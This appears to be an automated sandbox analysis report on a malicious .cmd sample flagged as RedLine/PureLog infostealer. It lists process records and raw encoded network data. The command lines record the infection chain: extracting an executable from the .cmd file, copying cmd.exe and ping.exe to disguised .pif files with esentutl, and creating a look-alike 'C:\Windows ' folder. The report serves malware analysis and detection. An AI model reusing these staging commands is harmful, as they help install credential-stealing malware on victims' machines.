                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: yb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19H
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1369INData Raw: 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: cDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XY
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1369INData Raw: 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb2
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1369INData Raw: 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: B286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0d


                                                                                                                                                                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:12
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\E_dekont.cmd" "
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6b4330000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:12
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:12
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7d9130000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:35'328 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:13
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'051'648 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:943266BC468E334D168F1F43831E8B7D
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:18
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\wdmvmswJ.cmd" "
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0xa40000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:18
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:19
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:19
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:20
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF /o
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:20
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:20
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:21
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x10000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:24
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'290'240 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:E270AE516A40989DA2942FC5476DC07D
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:24
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x10000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:24
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'225'728 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:C735DBF5B2240108A94A4D6FB664CF20
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:25
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x10000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:25
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\xpha.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x890000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:18'944 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:25
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:138'056 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:25
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:174'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:21
